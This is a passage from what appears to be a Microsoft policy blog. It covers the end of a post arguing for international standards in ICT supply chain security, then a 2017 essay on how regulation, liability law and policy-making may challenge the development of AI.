In addition to effective risk management, I can see a clear case for international standards in international supply chains. If we recognize that even the smallest weakness in a jurisdiction “over there” might be a way in for cybercriminals “over here,” then international standards offer a common basis for judging whether or not a supply chain is secure in its fundamentals.

Governments considering how to make their ICT supply chains more secure need to solicit industry feedback on their proposals. Indeed, I would argue that public-private partnerships to develop supply chain proposals are the best way to approach the issue. Both states and companies gain by cooperating in the fight against supply chain-led cyberattacks.

Microsoft depends on the trust our customers place in our products, and as a multinational company we understand the importance of secure cross-border supply chains. So, even if C-SCRM is rarely the first thing considered when looking at cybersecurity, we will continue to make the case for a comprehensive and global approach to securing ICT supply chains that is risk-based, transparent, flexible and standards-led.

How future policy and regulations will challenge AI
By Paul Nicholas, April 25, 2017

I recently wrote about how radical the incorporation of artificial intelligence (AI) into cybersecurity will be. Technological revolutions, however, are frequently not as rapid as we think. We tend to see specific moments, from Sputnik in 1957 to the iPhone in 2007, and call them “game changing,” without appreciating the intervening stages of innovation, implementation and regulation that ultimately result in that breakthrough moment. What can we therefore expect from this iterative and less eye-catching part of AI's development, looking not just at the technological progress, but at its interaction with national policy-making processes?

I can see two overlapping, but distinct, perspectives. The first relates to the reality that information and communication technology (ICT) and its applications develop faster than laws. In recent years, examples such as social media and ride-hailing apps have seen this translate into the following regulatory experience:

  1. Innovation: R&D processes arrive at one or many practical options for a technology;
  2. Implementation: These options are applied in the real world, are refined through experience, and begin to spread through major global markets;
  3. Regulation: Governments intervene to defend the status quo or to respond to new categories of problem, e.g. cross-border data flows;
  4. Unanticipated consequences: Policy and technology’s interaction inadvertently harms one or both, e.g. the Wassenaar Arrangement’s impact on cybersecurity R&D.

AI could follow a similar path. However, unlike e-commerce or the sharing economy (but like nanotechnology or genetic engineering), AI actively scares people, so early regulatory interventions are likely. For example, a limited focus on using AI in certain sectors, e.g. defense or pharmaceuticals, might be positioned as more easily managed and controlled than AI's general application. However, could such a limit really be imposed, particularly in light of the potential for transformative creative leaps that AI seems to promise? I suspect not, which would result in yet more controls. Leaving aside the fourth stage of unknown unknowns and unanticipated consequences, the third phase, i.e. regulation, would almost inevitably run into trouble of its own by virtue of having to legally define something as unprecedented and mutable as AI. It seems to me, therefore, that even the basic phases of AI's interaction with regulation could be fraught with problems for innovators, implementers and regulators.

The second, more AI-specific perspective is driven by the way its capabilities will emerge, which I feel will break down into three basic stages:

  1. Distinction: Creation of smarter sensors;
  2. Direction: Automation of human-initiated decision-making;
  3. Delegation: Enablement of entirely independent decision-making.

Smarter sensors will come in various forms, not least as part of the Internet of Things (IoT), and their aggregated data will have implications for privacy. Twentieth-century “dumb lenses” are already being connected to systems that can pick out number plates or human faces, but truly smart sensors could know almost anything about us, from what is in our fridge and on our grocery list, to where we are going and whom we will meet. It is this aggregated, networked aspect of smarter sensors that will be at the core of the first AI challenge for policy-makers. As sensors become discriminating enough to anticipate what we might do next, e.g. in order to offer us useful information ahead of time, they create an inadvertent panopticon that the unscrupulous and actively criminal can exploit.

Moving past this challenge, AI will become able to support and enhance human decision-making. Human input will still be essential but it might be as limited as a “go/no go” on an AI-generated proposal. From a legal perspective, mens rea or scope of liability might not be wholly thrown into confusion, as a human decision-maker remains. Narrow applications in certain highly technical areas, e.g. medicine or engineering, might be practical but day-to-day users could be flummoxed if every choice had unreadable but legally essential Terms & Conditions. The policy-making response may be to use tort/liability law, obligatory insurance for AI providers/users, or new risk management systems to hedge the downside of AI-enhanced decision-making without losing the full utility of the technology.

Once decision-making is possible without human input, we begin to enter the realm of speculation. However, it is important to remember that there are already high-frequency trading (HFT) systems in financial markets that operate independently of direct human oversight, following algorithmic instructions. The suggested linkages between “flash crash” events and HFT nonetheless highlight the problems policy-makers and regulators will face. It may be hard to foresee what even a “limited” AI might do in certain circumstances, and the ex-ante legal liability controls mentioned above may seem insufficient to policy-makers should a system get out of control, either in the narrow sense of being out of the control of those legally responsible for it, or in the general sense of being out of anyone's control.

These three stages suggest significant challenges for policy-makers, with existing legal processes losing their applicability as AI moves further away from direct human responsibility. The law is, however, adaptable, and solutions could emerge. In extremis we might, for example, be willing to supplement the concept of “corporate persons” with a concept of “artificial persons”. Would any of us feel safer if we could assign legal liability to the AIs themselves and then sue them as we do corporations and businesses? Maybe.

In summary, then, the true challenges for AI's development may not lie solely in the big-ticket moments of beating chess masters or passing Turing Tests. Instead, there will be any number of roadblocks caused by the needs of regulatory and policy-making systems still rooted in the 19th and 20th centuries. And, odd though this may sound coming from a technologist like me, that delay might be a good thing, given the potential transformative power of AI.